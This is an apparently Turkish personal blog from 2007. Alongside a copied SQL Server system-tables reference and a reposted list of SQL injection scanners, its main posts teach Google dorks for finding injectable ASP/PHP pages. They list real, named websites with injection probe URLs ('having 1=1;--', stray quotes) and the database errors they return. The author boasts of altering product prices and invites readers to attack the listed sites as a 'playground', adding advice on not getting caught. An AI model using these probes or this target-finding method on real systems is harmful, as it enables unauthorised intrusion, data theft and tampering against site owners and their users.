19 Eylül 2007 Çarşamba

System Tables (T-SQL)
The information used by Microsoft® SQL Server™ and its components are stored in special tables known as system tables.
Note System tables should not be altered directly by any user. For example, do not attempt to modify system tables with DELETE, UPDATE, or INSERT statements, or user-defined triggers.
Applications should not be written to query the system tables directly. Applications should instead use any of these components to retrieve information stored in the system tables:
Information schema views
System stored procedures
Transact-SQL statements and functions
SQL-DMO
Database application programming interfaces (API) catalog functions
These components constitute a published API for obtaining system information from SQL Server. Microsoft maintains the compatibility of these components from release to release. The format of the system tables is dependent upon the internal architecture of SQL Server and may change from release to release. Therefore, applications that directly access the system tables may have to be changed before they can access a later version of SQL Server.
System Tables in the master Database Only
These tables store server-level system information.
sysaltfiles
sysdevices
sysoledbusers
syscacheobjects
syslanguages
sysperfinfo
syscharsets
syslockinfo
sysprocesses
sysconfigures
syslogins
sysremotelogins
syscurconfigs
sysmessages
sysservers
sysdatabases


System Tables in Every Database
These tables store database-level system information for each database.
sysallocations
sysfiles
sysobjects
syscolumns
sysforeignkeys
syspermissions
syscomments
sysfulltextcatalogs
sysprotects
sysconstraints
sysindexes
sysreferences
sysdepends
sysindexkeys
systypes
sysfilegroups
sysmembers
sysusers
SQL Server Agent Tables in the msdb Database
These tables store information used by SQL Server Agent.
sysalerts
sysjobschedules
systargetservergroupmembers
syscategories
sysjobservers
systargetservergroups
sysdownloadlist
sysjobsteps
systargetservers
sysjobhistory
sysnotifications
systaskids
sysjobs
sysoperators

Tables in the msdb Database
These tables store information used by database backup and restore operations.
backupfile
backupset
restorefilegroup
backupmediafamily
restorefile
restorehistory
backupmediaset


Tables Used to Store Replication Information
These tables are used by replication and stored in the master database.
sysarticles
syspublications
sysservers
sysdatabases
sysreplicationalerts
syssubscriptions
sysobjects


These tables are used by replication and stored in the distribution database.
MSagent_parameters
MSmerge_agents
Msrepl_originators
MSagent_profiles
MSmerge_history
MSrepl_transactions
MSarticles
MSmerge_subscriptions
MSrepl_version
MSdistpublishers
MSpublication_access
MSsnapshot_agents
MSdistributiondbs
Mspublications
MSsnapshot_history
MSdistribution_agents
Mspublisher_databases
MSsubscriber_info
MSdistribution_history
MSreplication_objects
MSsubscriber_schedule
MSdistributor
MSreplication_subscriptions
MSsubscriptions
MSlogreader_agents
MSrepl_commands
MSsubscription_properties
MSlogreader_history
MSrepl_errors

These tables are used by replication and stored in the user’s database.
MSmerge_contents
MSmerge_tombstone
sysmergeschemachange
MSmerge_delete_conflicts
sysarticleupdates
sysmergesubscriptions
MSmerge_genhistory
sysmergearticles
sysmergesubsetfilters
MSmerge_replinfo
sysmergepublications


(c) 1988-98 Microsoft Corporation. All Rights Reserved.

7 Eylül 2007 Cuma

Kurcalarken-Gezerken:Nasa Hacker' ı ile Röportaj

Bugün Ferruh Mavituna'nın günlüğünü okurken oradan onun başka bir yazısına geçtim. Nasa sistemine giren hacker ile ilgili yazısı şurada:http://ferruh.mavituna.com/makale/nasa-hacker-i-ile-roportaj
Ama benim o hacker'dan çok vurgulamak istediğim yazıdaki şurası:

...
Zincir ve zayıf halka teorisinin kuralının en büyük örneklerinden biri
olsa gerek. Eğer yeterince sistemi tararsanız açık
bulabilirsiniz.
Zamanında yahoo' da benzer bir şekilde
normalde internette hiç bir yerde bağlantısı olmayan bir iç proxy ile
hacklenmişti.
...




Bence açık bulmak için çok doğru ve yeterli bir yöntem, yeteri kadar sistemi taramak

4 Eylül 2007 Salı

Top 15 free SQL Injection Scanners

http://www.security-hacks.com/2007/05/18/top-15-free-sql-injection-scanners
--------------------------------------------------------------

Top 15 free SQL Injection Scanners
Friday, 18 May 2007 - 15:05 EST Tools, Web Security, Network
While the adoption of web applications for conducting online business has enabled companies to connect seamlessly with their customers, it has also exposed a number of security concerns stemming from improper coding. Vulnerabilities in web applications allow hackers to gain direct and public access to sensitive information (e.g. personal data, login credentials).
Web applications allow visitors to submit and retrieve data to/from a database over the Internet. Databases are the heart of most web applications. They hold data needed for web applications to deliver specific content to visitors and provide information to customers, suppliers etc.
SQL Injection is perhaps the most common web-application hacking technique which attempts to pass SQL commands through a web application for execution by the back-end database. The vulnerability is presented when user input is incorrectly sanitized and thereby executed.
Checking for SQL Injection vulnerabilities involves auditing your web applications and the best way to do it is by using automated SQL Injection Scanners. We’ve compiled a list of free SQL Injection Scanners we believe will be of a value to both web application developers and professional security auditors.
SQLIer - SQLIer takes a vulnerable URL and attempts to determine all the necessary information to exploit the SQL Injection vulnerability by itself, requiring no user interaction at all. Get SQLIer.
SQLbftools - SQLbftools is a collection of tools to retrieve MySQL information available using a blind SQL Injection attack. Get SQLbftools.
SQL Injection Brute-forcer - SQLibf is a tool for automatizing the work of detecting and exploiting SQL Injection vulnerabilities. SQLibf can work in Visible and Blind SQL Injection. It works by doing simple logic SQL operations to determine the exposure level of the vulnerable application. Get SQLLibf.
SQLBrute - SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time based and error based exploit types on Microsoft SQL Server, and error based exploit on Oracle. It is written in Python, uses multi-threading, and doesn’t require non-standard libraries. Get SQLBrute.
BobCat - BobCat is a tool to aid an auditor in taking full advantage of SQL injection vulnerabilities. It is based on AppSecInc research. It can list the linked severs, database schema, and allow the retrieval of data from any table that the current application user has access to. Get BobCat.
SQLMap - SQLMap is an automatic blind SQL injection tool, developed in python, capable to perform an active database management system fingerprint, enumerate entire remote databases and much more. The aim of SQLMap is to implement a fully functional database management system tool which takes advantages of web application programming security flaws which lead to SQL injection vulnerabilities. Get SQLMap.
Absinthe - Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to Blind SQL Injection. Get Absinthe.
SQL Injection Pen-testing Tool - The SQL Injection Tool is a GUI-based utility designed to examine database through vulnerabilities in web-applications. Get SQL Injection Pen-testing tool.
SQID - SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities. Get SQID.
Blind SQL Injection Perl Tool - bsqlbf is a Perl script that lets auditors retrieve information from web sites that are vulnerable to SQL Injection. Get Blind SQL Injection Perl Tool.
SQL Power Injection Injector - SQL Power Injection helps the penetration tester to inject SQL commands on a web page. It’s main strength is its capacity to automate tedious blind SQL injection with several threads. Get SQL Power Injection.
FJ-Injector Framwork - FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation. Get FJ-Injector Framework.
SQLNinja - SQLNinja is a tool to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end database. Get SQLNinja.
Automagic SQL Injector - The Automagic SQL Injector is an automated SQL injection tool designed to help save time on penetration testing. It is only designed to work with vanilla Microsoft SQL injection holes where errors are returned. Get Automagic SQL Injector.
NGSS SQL Injector - NGSS SQL Injector exploit vulnerabilities in SQL injection on disparate database servers to gain access to stored data. It currently supports the following databases: Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase. Get NGSS SQL Injector.

3 Ağustos 2007 Cuma

HTML 4.01 Entities Reference

HTML 4.01 supports the ISO 8859-1 (Latin-1) character set.


The lower part of ISO-8859-1 (codes from 0-127) is the
original 7-BIT ASCII
standard
.

Most of these characters can be used without a character reference.


The higher part of ISO-8859-1 (codes from 160-255) can all be used using
character entity names.

19 Temmuz 2007 Perşembe

Sql sızma( injection) için gerçek siteleri nereden bulacağım?

Sitelerdeki sql sızma açıklarını bulmak hiç de zor değil. Kendinizi sql, mssql, mysql ya da herhangi bir veritabanı konusunda geliştirmek için ihtiyacanız olan deneme tahtalarını bulmak hiç zor değil.
Google'dan arama yaparak rahatlıklar bulabilirsiniz.

Benim denediğim yöntemle, özellikle toplu açıkları bulanabilir.

Google'da "online alışveriş çözümleri", "eticare çözümleri", "kurumsal web sitesi" kelime gruplarını arattırırsanız. Web tasarımı yapan, ticari web sitesi paketleri, alışveriş sitesi paketleri sunan biçok siteyle karşılacaksınız. Bu sitelerin referans bölümlerinden yaptıkları sitelere ulaşabilir. Referans sitedeki bağlantıları deneyerek açklar bulanabilir.

Ben sql/sızma/injection konusunda fazla tecrübeli olmamama rağmen google'da arattırdeğım birçok sitede açık bulabildim. Bu açıklar o kadar kötü açıklardı ki sitedeki ürünlerin fiyatlarını bile değiştirebiliyordum.

Aklınızdan herkes artık önlemini alıyor diye geçirebilirsiniz. Fakat yanılıyorsunuz. Bu siteleri yapanlar da sonuçta insan. Bir sitenin en az 10 tane sayfası oluyor. Bunların alt sayfaları eklentileri derken, hepsindeki sorguları, ifadeleri denetimden geçirmek kolay değil. Genellikle üye giriş sayfalarındaki formlarda süzme işlevleri kullanırlar. Fakat www.xxx.com/haber/resim.asp?resimid?=145 gibi bir sayfada "resimid" değerini süzmek ile uğraşmazlar. Çünkü bu bir resimin bağlantısıdır. Zaten javascript ile bir pencerede gösteriliyordur ve adresi görünmüyordur. Böyle küçük hatalarla - hata demeyelim önlem almamak- büyük açıklar oluşabiliyor.

Bir işyerinin referanslarının birinde açık bulduysanız, bu demektir ki onlarca sitenin açığını bulmuşsunuz. Diğer referans sitelerin bir yerinde illaki bir açık vardır.

İnsan bu, "Beşer şaşar".

Ama dikkat edilmelidir ki bu referans siteler ticari kurumların siteleridir ve içindeki bilgilerin, sahibinden izinsiz olarak ele geçirilmesi suçtur. Hırsızlık kapsamına girer. Siteki bilgilerin değiştirilmesi, silinmesi - örneğin bir ürünün fiyatının değiştirilmesi- o firmanın adresine gidip, ürünlerini kırmaktan farksızdır.

Sql konusunda, denemelerinizi yaparken dikkatli olun. Evden vs. giriyorsanız yakalanma olasılığınız yüksektir. Dikkatli olun!

Google araması ile sql test sitesi

http://www.driverara.org/sorudetay.asp?id=4715%27 having 1=1;--

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'soru.cat' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/sorudetay.asp, line 72

Google araması ile sql test sitesi

http://www.prc.gov/dockets.asp?ID=R2006-1'

Sunucu:Oracle
Hata:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Oracle][ODBC][Ora]ORA-01756: quoted string not properly terminated

/dockets.asp, line 41

http://www.trb.org/news/blurb_detail.asp?id=2326'

Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near ',','.

/news/blurb_detail.asp, line 24


Sql sızma denemeleri...
Sql injection

Google araması ile sql test sitesi

id=25013 having 1=1
http://www.aiim.org/standards.asp?id=25013%20having%201=1

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'vwwebarticles.ProductID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/GetArticle.asp, line 101

17 Temmuz 2007 Salı

Çözüm

Adres: http://www.xxx.com/default.asp?id=15 having 1=1;--

Hata:

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value '15 having 1=1;--' to a column of data type int.

/default.asp, line 61

Çözüm:
http://www.xxx.com/default.asp?id=15' having 1=1;--

Kaynak:http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=243810&SiteID=1
Alıntı:

-
Syntax error converting the varchar value 'a' to a column of data type int

I have a table(tab1) with a column(col1) of type varchar. I insert a row with an integer value(1). And when i query the table using the sql, select col1 from tab1 where col1 = 1, it works fine.

But after i insert a varchar, say 'a' and then do the same query, i get an error message saying, "Syntax error converting the varchar value 'a' to a column of data type int.". Why is this so? Please reply.

- Try select col1 from tab1 where col1 = '1'
The ' around the 1 tells SQL server it is comparing the charater 1 not the number 1



15 Temmuz 2007 Pazar

Google araması ile sql test için site bulma

http://www.google.com.tr/search?q=inurl:"asp?id="

Arama kutusuna inurl:"asp?id=" veya inurl:"php?id=" vs. anahtar ifadeleriyle kendiniz için bir test ortamı sunacak site bulabilirsiniz.
Tabi sitenin sahibinin bu testi sunduğundan haberi olmayacak başka

inurl:"asp?%id%=0..999999"
http://www.google.com.tr/search?hl=tr&q=inurl%3A%22asp%3F%25id%25%3D0..999999

http://www.hayatiminhatasi.com

http://www.hayatiminhatasi.com
Üye giriş ekranında bariz hata var. Biraz kurcaladıktan sonra site sahibine ve üyelerine iletmek gerekli :D

http://www.onlineyayin.net/tv_yayin.asp?id

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[MySQL][ODBC 3.51 Driver][mysqld-4.0.23a]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

/inc_sayac.asp, line 33

http://www.cnbce.com/dizi.asp?ID=3 having 1=1

Microsoft OLE DB Provider for SQL Server error '80040e14'

Column 'Serials.SerialID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

/dizi.asp, line 13



http://www.teknodijital.com/asp
/listgroup.asp?group=

(union)
http://www.stokburada.com/
index.php?k_id=
http://www.alisverissiteleri.net/
siteler.asp?kategori=

HackBar 1.1.1 Firefox eklentisi

HackBar bir firefox eklentisi, sql ile sitelere sızarken, sizi site adresiyle boşlukları kaldırmaktan, gerekli fonksiyonları aramaktan vs. kurtarıyor. Çok kullanışlı bir eklenti
Bu adresten inceleyebilirsiniz ve indirebilirsiniz.

http://www.alisverissiteleri.net/
alisveris.asp?sid=

Web developer extension

Bu firefox eklentisi çok işe yarıyor: Cookie silmek, düzenlemek, javascripti, meta redirecti engellemek, form detayları, gizli öğeler...
Sayfanın içini dışını gösteriyor düğmeleriyle size.
Ben http://ferruh.mavituna.com/makale/firefox-eklentileri/ Ferruh Mavituna'nın günlüğünde görmüştüm. Kullandım işe yarıyor.

Aman ha, siteyle ilgim yok. Sadece internette ararken buldum.

"http://www.sicakhikaye.com/
kategori.asp?id="


Site bir "porno hikaye" sitesi. En baştan söyleyeim işim olmaz nu sitelerle. Fakat asp kullanmış. Açığı belli artık nasıl oynarsanız. id= yerine yaza yaza sızacaksınız artık...

Sql injection

Sql ile uğraşırken google'da arama yapıp, açığı olan siteleri yayınlıyorum. Gerçek hayatta sitelerde hala açıklar var. Bir çeşit canlı deneme ortamı oluşturuyoeum. Siz de bu günlükten yaralanıp, sitelerde kendinizi sınayabilirsiniz sql ile sızma konusunda.

En baştan söyleyeyim bu siteleri test amaçlı bulup yazıyorum. Oyun parkı gibi bir şey yani...

Siteler üstünde dilediğinizi yapmakta serbestsiniz. Sonuçların tüm sorumluluğu, sitelere sızma girişiminde bulunan arkadaşlarındır. Bu siteleri yayınlayan ben de değil.

Hadi Eyvallah,
Kolay gelsin.